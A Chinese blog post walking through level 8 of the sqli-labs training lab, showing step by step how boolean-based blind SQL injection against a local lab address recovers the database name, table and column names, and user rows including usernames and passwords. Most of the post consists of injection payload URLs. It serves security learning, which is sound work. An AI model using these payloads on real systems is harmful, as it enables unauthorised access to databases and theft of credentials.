首页 > 数据库 >sqli-labs第八关

sqli-labs第八关

时间:2023-02-17 08:11:35浏览次数:41  
标签:98 http Less 88.138 第八 192.168 labs sqli id

  1. sqli-labs第八关

(1) 求闭合字符

① 输入http://192.168.88.138:98/Less-8/?id=1'页面异常

 

 

 

② 输入http://192.168.88.138:98/Less-8/?id=1' and 1=1 -- + 页面正常

 

 

 

③ 输入http://192.168.88.138:98/Less-8/?id=1' and 1=2 -- + 页面异常

 

 

 

 综上判断出该网站的闭合字符为’

(2) 求当前数据库名的长度

① 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())<10 -- +   页面正常

 

 

 

② 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())<5 -- +   页面异常

 

 

 

③ 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())<7 -- +   页面异常

 

 

 

④ 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())=8 -- +   页面正常

 

 

 

  综上可以判断出该数据库名长度为 8

(3) 求当前数据库名对应的ascii值(与求库名方法相同,逐一使用二分法判断数据库名每一位的ascii值)

① 当输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),1,1)) =115 -- +  页面正常

 

 

 

说明数据库名第一位是 s

 

② 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),2,1)) =101 -- +  页面正常

 

 

 

说明数据库名第二位是e

 

③ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),3,1)) =99 -- +  页面正常

 

 

 

说明数据库名第三位是c

 

④ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),4,1)) =101 -- +  页面正常

 

 

 

说明数据库名第四位是u

 

⑤ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),5,1)) =114 -- +  页面正常

 

 

 

说明数据库名第五位是r

 

⑥ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),6,1)) =105 -- +  页面正常

 

 

 

说明数据库名第六位是i

 

⑦ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),7,1)) =116 -- +  页面正常

 

 

 

说明数据库名第七位是t

 

⑧ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),8,1)) =121 -- +  页面正常

 

 

 

说明数据库名第8位是y

 

 由上述可知,该数据库的库名为security

(4) 求表的数量(与求库名方法相同,使用二分法判断数量)

① 输入http://192.168.88.138:98/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4 -- +  页面正常

 

 

 

  综上说明该数据库表的数量为4

(5) 求表名的长度

① 输入http://192.168.88.138:98/Less-8/?id=1'   and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 -- + 页面正常

 

 

 

说明第一个表名的长度为6

 

② 输入http://192.168.88.138:98/Less-8/?id=1'  and length((select table_name from information_schema.tables where table_schema=database() limit 2,1))=7 -- +  页面正常

 

 

 

说明第二个表名长度为7

③ ....

 

(6) 求表名对应的ascii值

① 输入http://192.168.88.138:98/Less-8/?id=1'  and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117   -- +   页面正常

 

 

 

说明第四个表的第一个ascii值为u

 

② 输入http://192.168.88.138:98/Less-8/?id=1'  and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),2,1))=115   -- +   页面正常

 

 

 

说明第四个表的第二个ascii值为s

 

③ ...

  综上求出第四个表的表名为users

(7) 求列的数量

 输入http://192.168.88.138:98/Less-8/?id=1'   and  (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=3 --+  页面正常

 

 

 

  说明该表中列的数量为3

(8) 求列名对应的ascii值

① 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),1,1))=105 -- +  页面正常

 

 

 

说明第一列列名的第一个ascii值为i

② 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 -- + 页面正常

 

 

 

说明第一列列名的第二个ascii值为d

 

③ ...

④ 综上求出三列列名分别为:id,username,password

(9) 求字段的数量

 输入http://192.168.88.138:98/Less-8/?id=1' and  (select count(*) from users)=13 -- + 页面正常

 

 

 

  说明一共有13条数据

(10) 求字段内容的长度

① 输入http://192.168.88.138:98/Less-8/?id=1'   and  length((select id from users limit 0,1))=1 --+  页面正常

 

 

 

说明id字段的长度为1

 

(11) 求字段内容对应的ascii值

① 输入http://192.168.88.138:98/Less-8/?id=1'   and ascii(substr((select username from users limit 0,1),1,1))=68 --+  页面正常

 

 

 

说明第一个ascii值为D

② 输入http://192.168.88.138:98/Less-8/?id=1'   and ascii(substr((select username from users limit 0,1),2,1))=117 --+  页面正常

 

 

 

说明第二个ascii值为u

 

③ ...

  最终求出第一个字段id=1,username:Dumb,password:Dumb

 

标签:98,http,Less,88.138,第八,192.168,labs,sqli,id
From: https://www.cnblogs.com/koitoYuu/p/17128870.html

相关文章

  • SqlInjection
    SQL注入一、漏洞简介结构化查询语言(StructuredQueryLanguage,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范......
  • 重学Java-第八章 Java条件语句
    8.1if语句8.1.1语法​ 当需要根据给定条件来决定是否执行一段代码时,就需要用到if语句了。if块仅在布尔表达式(if括号内的表达式)为true时执行。if块的结构如下:if(条......
  • 《程序是怎样跑起来的》·第八章 程序是在何种环境下运行
    热身问题:CPU可以解析和运行的程序形式称为什么代码?将多个目标文件结合生成EXE文件的工具称为什么?扩展名为.obj的目标文件的内容,是源代码还是本地代码?把多个目标......
  • 2023第八届少儿模特明星盛典 小超模江姿莹 担任全球赛主持人
    2023第八届少儿模特明星盛典全球总决赛将在春城昆明举办,3月24日至28日,开展为期5天的春季时尚盛宴。赛程丰富多样,打造双主题个人赛、亲子/家庭赛、贺年大秀、荣耀师生赛、IPA......
  • 2023第八届少儿模特明星盛典 小超模张娣菘 担任全球赛形象大使
    2023第八届少儿模特明星盛典全球总决赛将在春城昆明举办,3月24日至28日,开展为期5天的春季时尚盛宴。赛程丰富多样,打造双主题个人赛、亲子/家庭赛、贺年大秀、荣耀师生赛、IPA......
  • 2023第八届少儿模特明星盛典 小超模张宸溪 担任全球赛主持人
    2023第八届少儿模特明星盛典全球总决赛将在春城昆明举办,3月24日至28日,开展为期5天的春季时尚盛宴。赛程丰富多样,打造双主题个人赛、亲子/家庭赛、贺年大秀、荣耀师生赛、IPA......
  • 使用pycharm打开sqlite的问题
    问题:有同学在sqlite数据库文件执行数据库迁移完成前,点开了他,导致sqlite数据库被pycharm当成文本文件打开了,并且不会改了。其实sqlite文件和电脑中的其他文件(xx.mp4,xx.tx......
  • Python SQLite创建数据库和数据表及数据的增删改查
    SQLite是一款轻型的SQL类型数据库,处理速度快且占用资源非常低,Python自带,不需要配置不需要任何外部的依赖。数据库本身就是一个.db文件,非常适合存储本地数据。本文主要介绍......
  • tortoise_fastapi_sqlite
    tortoise-orm在fastapi中的使用"""TortoiseORM"""fromtortoise.contrib.fastapiimportregister_tortoisefromtortoise.contrib.pydanticimportpydantic_mo......
  • sqlalchemy_sqlite_shellhistory
    /Users/song/Code/sqlalchemy_learn_20230210/le00.pyfromsqlalchemyimportColumn,String,create_engine,Integerfromsqlalchemy.ormimportsessionmaker,declara......